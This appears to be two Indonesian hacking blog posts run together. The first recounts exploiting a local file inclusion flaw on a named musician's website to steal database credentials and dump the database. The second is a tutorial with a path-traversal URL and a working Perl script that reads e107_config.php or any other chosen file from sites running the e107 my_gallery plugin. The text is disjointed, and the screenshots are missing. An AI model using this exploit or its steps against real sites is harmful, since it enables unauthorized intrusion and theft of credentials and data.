Intro

Sebenarnya ini sudah basi, dan mungkin repost. Tapi biar repost, yang penting happy™. Beberapa waktu lalu, ketika terjadi konflik Israel – Palestina di Gaza, ada seorang musisi bernama Michael Heart yang menuangkannya dalam lagu berjudul "We Will Not Go Down" dan lagu itu sendiri bebas di-download. Saya sendiri sudah men-download lagu tersebut. Tapi pada artikel ini, kita tidak akan membahas lagu tersebut melainkan celah yang terdapat pada situs Michael Heart.

The Proof

Langsung saja, saya menuju ke URL lagunya:

http://www.michaelheart.com/sfg/downloads/a22685d/dl.php?file=we_will_not_go_down.mp3

Coba perhatikan URL di atas, sudah tahu kan letak celahnya. Yup, LFI. Kalau belum mengerti, coba ditanyakan ke mbah google. Ok, singkat kata singkat cerita, dengan sedikit trik pada celah tersebut maka bisa diperoleh username dan password untuk databasenya. Dan lebih mudah lagi karena ternyata server databasenya terbuka untuk public menurut informasi dari nmap. Setelah tahu kondisi tersebut, coba kita koneksi ke server tersebut dengan username dan password yang sudah ada:





Ternyata bisa :| … dan selanjutnya kita lihat databasenya. hmmm… ada satu database yang menarik. Ok, kita coba lihat tables yang ada pada database tersebut.





Ok, cukup sekian acara melihat-lihatnya. Sekarang, kita dump saja databasenya biar bisa dipelajari isinya.





Ukuran dumpnya tidak terlalu besar tapi karena bandwidth yang < 1 kbps jadi prosesnya lama (lol). Nah, setelah selesai dan matang, hasilnya seperti ini:

Outro

Kalau tidak salah, celahnya sudah diperbaiki oleh yang bersangkutan. Akhir kata, artikel ini sangat sederhana dan kemungkinan besar hanya menjadi hiburan / bahan tertawaan bagi para 1337 … jadi saya mohon maaf jika demikian adanya. Kritik, saran dan caci-maki, silakan dituangkan pada comments.

Terima Kasih

Tanpa urutan: NitrouZ, dylavig, sakitjiwa, fl3xu5, k0il, d3l (terima kasih atas dukungannya), pinczakko, kris kaspersky, dan Anda :)

http://www.target.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php

Contohnya seperti ini:





Nah, daripada menggunakan browser, bagaimana jika kita membuat script sederhana untuk memudahkan proses ini :D . Jadi script ini akan menerima 2 parameter dimana parameter terakhir sifatnya optional yaitu nama file pada target yang ingin dilihat. Jika parameter tersebut kosong, maka akan mencoba membuka file configurasi e107. Nah, berikut ini snippetnya dalam bahasa perl (maaf kodenya kacau maklum saya bukan programmer):

#!/usr/bin/perl

use LWP::UserAgent;

die("[i] aturan pakai: e107conf.pl <website> [file]\n") unless @ARGV > 0;
$ua = LWP::UserAgent->new;
$fx = ($ARGV[1] eq '') ? "../../e107_config.php" : $ARGV[1];
$ex = $ua->request(HTTP::Request->new(GET => "http://".$ARGV[0]."/e107_plugins/my_gallery/dload.php?file=".$fx));

if ($ex->is_success) { print "[+] web: ".$ARGV[0]."\n".$ex->content."\n"; }

Nah, berikut ini 2 screenshot ketika script ini bekerja dimana pada screenshot pertama kita hanya memberikan alamat website yang ingin dieksploitasi, sedangkan pada screenshot ke-2 kita memberikan parameter ke-2 yaitu nama file yang ingin dilihat :)










Penutup
Sekian dulu tutorial sederhana dari saya, semoga bisa bermanfaat untuk Anda. Sampai jumpa di tutorial berikutnya :)


Ucapan Terima Kasih
Tanpa Urutan: Tuhan Yang Maha Esa, NitrouZ, pinczakko, hddstudio, dylavig, LiFe, LucuBRB, 4NV|e, movzx, k0il, semua rekan-rekan yang tidak sempat saya sebutkan satu-satu di sini (you know who you are) :) dan Anda yang telah membaca tutorial ini… (terima kasih telah membaca tutorial ini)…